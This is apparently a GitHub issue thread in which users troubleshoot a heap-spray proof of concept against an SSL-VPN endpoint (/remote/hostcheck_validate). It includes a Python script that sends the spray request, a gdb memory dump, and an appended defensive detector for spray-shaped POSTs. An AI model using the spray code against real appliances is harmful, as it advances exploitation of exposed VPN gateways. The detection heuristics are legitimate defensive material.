My heapspray has never been successful. I don't know if there is something wrong with the way I send packages. #4
Comments
I got the same results with the heap spray. Can't seem to get a response from the user though. |
Yes, I tested it today and it didn't effectively result in a heap spray. I only managed to heap spray xxxx0a0d to overwrite it with 0x42424242 once, but the offsets in it were still wrong. |
It's still not working. I may need to change the way I send out packages. |
In the Assetnote blog I noticed with gdb that the first request was made with calloc, but mine shows malloc. I have tested Golang and the result is the same. Something is questionable about that PoC; maybe another blog explains it. |
Did you manage the heap spray? |
Hi, thank you for sharing, have you solved it? I also encountered the same problem |
Yes, it's been resolved. |
Hey @AshLQ, I'm running into a similar issue trying to test this on 7.4.2. Would you be able to share how you got the PoC working? It would be much appreciated. |
```python
import socket
import ssl

# TLS client context that skips certificate validation (self-signed appliance cert)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

def send_req(req):
    # `host` is a (hostname, port) tuple defined elsewhere in the original script
    try:
        s = socket.create_connection(host, timeout=20)
    except OSError:
        return -1
    ss = context.wrap_socket(s)
    ss.sendall(req)

# `form_value` is also defined elsewhere in the original script
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: 192.168.81.100\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body
print('heap spray')
send_req(data)
```
```
(remote) gef➤ x/100gx 0x00007fc6897c0a0d
0x7fc6897c0a0d: 0xc6897c0ec800007f 0xc6898b6c3000007f
0x7fc6897c0a1d: 0xc6898b6c4000007f 0x000000000000007f
0x7fc6897c0a2d: 0xc6898b6c18000000 0xc6898b6c1e00007f
0x7fc6897c0a3d: 0x000000000000007f 0x0000000000000000
0x7fc6897c0a4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aad: 0x0000000000000000 0x0000000000000000
0x7fc6897c0abd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0acd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0add: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aed: 0x0000000000000000 0x0000000000000000
0x7fc6897c0afd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b0d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b1d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b2d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b3d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0bad: 0x0000000000000000 0x0000000000000000
```
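From the defender's side, the request shape in the script above (a large POST whose form-field names are long runs of a single byte, repeated many times) is easy to pick out of captured traffic. The following is an added example, not code from this issue or from the Assetnote write-up: a small HTTP request parser plus two heuristics (dominant-byte ratio and longest form-field name) run over constructed sample requests. The hostname, the thresholds and the benign login request are assumptions; the spray-shaped sample mirrors the body layout of the posted script.

```python
"""Added example: flag heap-spray-shaped form POSTs in captured HTTP traffic.

The heuristic is derived from the request shape in the script posted above.
Real captures would come from a proxy or IDS; the samples here are constructed
inline. Thresholds and the hostname are assumptions.
"""
from dataclasses import dataclass
from urllib.parse import parse_qsl


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser, sufficient for captured POSTs."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    # Honour Content-Length so bytes of a following pipelined request are not mixed in
    length = int(headers.get("content-length", len(body)))
    return HttpRequest(method, path, headers, body[:length])


def dominant_byte_ratio(data: bytes) -> float:
    """Fraction of `data` made up of its single most frequent byte value."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return max(counts) / len(data)


def longest_field_name(body: bytes) -> int:
    """Length of the longest form-field name in a urlencoded body."""
    pairs = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return max((len(name) for name, _ in pairs), default=0)


def spray_indicators(req: HttpRequest, *, min_body=4096, max_name=128,
                     min_ratio=0.9) -> list:
    """Return reasons a request looks like a spray payload; empty list if benign."""
    reasons = []
    if req.method != "POST" or len(req.body) < min_body:
        return reasons
    ratio = dominant_byte_ratio(req.body)
    if ratio >= min_ratio:
        reasons.append(f"{ratio:.0%} of body is a single byte value")
    name_len = longest_field_name(req.body)
    if name_len > max_name:
        reasons.append(f"form field name of {name_len} bytes")
    return reasons


def scan(raw_requests):
    """Map the path of each flagged request to its indicator list."""
    flagged = {}
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = spray_indicators(req)
        if reasons:
            flagged[req.path] = reasons
    return flagged


# --- constructed samples (assumed hostname; not captured from any real device) ---
def build_post(path: str, body: bytes) -> bytes:
    return (f"POST {path} HTTP/1.1\r\nHost: vpn.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body


BENIGN = build_post("/remote/login", b"username=alice&passwd=hunter2")
# Same layout as the posted script: 20 copies of a 1808-byte field name
SPRAY = build_post("/remote/hostcheck_validate", (b"B" * 1808 + b"=x&") * 20)


if __name__ == "__main__":
    for path, why in scan([BENIGN, SPRAY]).items():
        print(path, "->", "; ".join(why))
```

Both indicators fire on the spray-shaped sample (over 99% of the body is `B`, and each field name is 1808 bytes), while the ordinary login POST is too small to be examined at all. The thresholds are deliberately loose; a legitimate form POST exceeding 4 KiB with a 128-byte field name and a body that is 90% one byte is rare enough that either indicator alone merits a closer look at the source.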